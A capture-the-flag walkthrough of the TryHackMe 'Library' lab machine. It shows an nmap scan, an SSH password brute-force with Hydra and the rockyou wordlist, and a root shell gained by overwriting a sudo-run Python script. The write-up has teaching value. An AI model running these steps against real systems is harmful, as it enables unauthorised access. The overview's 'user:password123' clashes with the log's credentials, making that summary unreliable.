TryHackMe Library

Overview

Machine Name: Library
OS: Linux
Difficulty: Easy

SSH brute-force attack was executed using Hydra to gain initial access. An nmap scan identified an open SSH port, and Hydra was used to find valid credentials (user:password123). After logging in, a privilege escalation was performed by replacing a Python script, which was executed with root privileges, allowing the attacker to gain root access to the system.

Reconnaissance

Nmap Scan Results

   1   │ # Nmap 7.94SVN scan initiated Fri Jun 28 16:04:20 2024 as: nmap -sCV --
       │ min-rate=5000 -Pn -vvv -oN targeted 10.10.124.112
   2   │ Nmap scan report for 10.10.124.112
   3   │ Host is up, received user-set (0.064s latency).
   4   │ Scanned at 2024-06-28 16:04:20 CEST for 10s
   5   │ Not shown: 998 closed tcp ports (reset)
   6   │ PORT   STATE SERVICE REASON         VERSION
   7   │ 22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ub
       │ untu Linux; protocol 2.0)
   8   │ | ssh-hostkey:
   9   │ |   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
  10   │ | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/X/Zd2/Rc7PrxR+K9bGX9i7Imk3JlU
       │ 274UsMqM6X03THehc6XUvg0URMryl9IldYLjQvD0fadIg1jB8rCxqzRiJi35nw7ICUXnpZr
       │ yDS/guLb94Sb9IrLWBTNNdUWV7bTb4gMaGHdyQAmKY62FgL2aKUFMn8SpxJu0WiVIQgcKkv
       │ 15s17rNqVD39kG8x/bfdftcjn/YtEP09Sy4z1FqXF9FT1xWKaVr3Pd5rCAU4rpOzVpS+qTj
       │ 77NWaXNDlcg3aCRaILD+4lquq8kVAA+VcXR9IwXOTKJRzRCMfYwd3M6QC45LlRa17xvhI++
       │ vBtCcGwxuD9JZsXu0Cd/5fdisrl
  11   │ |   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
  12   │ | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAA
       │ ABBBI8Oi4FyiWylek0a1n1TD1/TBOi2uXVPfqoSo1C56D1rJlv4g2g6SDJjW29bhodoVO6W
       │ 8VdWNQGiyJ5QW2XirHI=
  13   │ |   256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
  14   │ |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOPQQrT4KT/PF+8i33LGgs0c83MQL1m86
       │ 3niSGsBDfCN
  15   │ 80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  16   │ |_http-title: Welcome to  Blog - Library Machine
  17   │ | http-methods:
  18   │ |_  Supported Methods: GET HEAD POST OPTIONS
  19   │ |_http-server-header: Apache/2.4.18 (Ubuntu)
  20   │ | http-robots.txt: 1 disallowed entry
  21   │ |_/
  22   │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  23   │
  24   │ Read data files from: /usr/bin/../share/nmap
  25   │ Service detection performed. Please report any incorrect results at htt
       │ ps://nmap.org/submit/ .
  26   │ # Nmap done at Fri Jun 28 16:04:30 2024 -- 1 IP address (1 host up) sca
       │ nned in 10.02 seconds

Exploitation

Vulnerabilities Exploited

searchsploit OpenSSH 7.2p2
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                     |  Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                                           | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                                     | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service                                                                                                    | linux/dos/40888.py
OpenSSH 7.2p2 - Username Enumeration                                                                                               | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation                               | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                                           | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                                               | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration                                                                                              | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation Steps

hydra -t 20 -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.124.112
[DATA] attacking ssh://10.10.124.112:22/
[STATUS] 200.00 tries/min, 200 tries in 00:01h, 14344201 to do in 1195:22h, 18 active
[22][ssh] host: 10.10.124.112   login: meliodas   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-28 16:09:45

Post-Exploitation

Privilege Escalation

In this process, the attacker gains root access by exploiting the ability to execute a Python script with elevated privileges. They first delete any existing script named bak.py and then create a new script with a Python command to spawn a bash shell. This script is executed with sudo, which runs the script with root privileges, effectively giving the attacker a root shell. Finally, they confirm root access and read the root flag, proving full system control.

rm bak.py

echo "python -c 'import pty;pty.spawn("/bin/bash")'" > bak.py
ls
bak.py  user.txt
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
sudo /usr/bin/python3 /home/meliodas/bak.py
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)